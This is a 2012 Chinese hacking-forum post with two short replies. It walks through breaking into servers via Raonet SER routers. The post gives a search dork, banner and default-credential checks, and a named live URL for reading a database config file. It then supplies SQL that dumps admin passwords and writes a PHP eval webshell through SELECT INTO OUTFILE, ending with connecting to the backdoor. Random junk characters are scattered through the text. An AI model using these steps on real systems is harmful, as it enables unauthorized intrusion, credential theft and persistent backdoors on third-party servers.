找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2898|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:1 A: l5 a% u3 P) |  O* o
5 e7 m& V4 _+ G5 @0 a. T& n3 ?
1:google搜索'Raonet Subscriber Ethernet Router'
1 f  C, Q8 W' g" g9 f/ \3 i
0 o7 f( p% G' f" D- z5 P. @, W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
& l  j6 g5 u5 }' P2 l! S# u* d3 _# e. G" U! C, B7 \+ }) P- E
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
' h# M) S9 ]$ _! Y9 @4 S- j- S) x/ |0 Z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% e# g) g- J  q' s
- J% ~6 b, N6 }- U
- C1 B( s; v$ V, S) v6 ?4 ^; f+ q, v+ J0 W: {9 g
入侵步骤:
  T7 k+ z" k' t! Q& @: s' }. h9 x9 h5 l9 N8 V/ |
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php. D( Z* C: j. R. P8 d' ^8 G

- I7 z+ m; S8 k5 M2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc3 g: v* Q( j  g
3:得到密码后连接,查看GUI管理密码:
7 T- L% G5 V1 G4 ?( M- ?- y5 Zuse ser_500" L+ a: d9 z# t" H# s
select id,passwd from user;0 k2 w6 m3 a7 H: i  V
4:通过数据库写入webshell,执行命令:
2 w; |/ X# C9 A/ V6 Nuse mysql;4 Q7 H) P/ I  {; Z; \  S
create table ok(cmd TEXT);
# h4 Y" t' ]4 W; {insert into ok values("<?php @eval($_POST[cmd])?>");6 a  m8 e9 M" P9 F
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: H7 ]8 L6 E/ R# r$ ?( [6 @3 b. |7 i- odrop table ok;
7 C/ H$ \" {; t+ s0 x
5 s/ I2 i) ?& ?* D5:连接后门shell.php   F2 R0 ~( a+ M" c2 z
6 `7 T+ t2 c( q0 x' i- M. c  P+ w, [
6. 搞定!
* r+ K& o0 E  G" ^( q( b. m: F7 J, N0 A) @0 G$ z  @: y
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表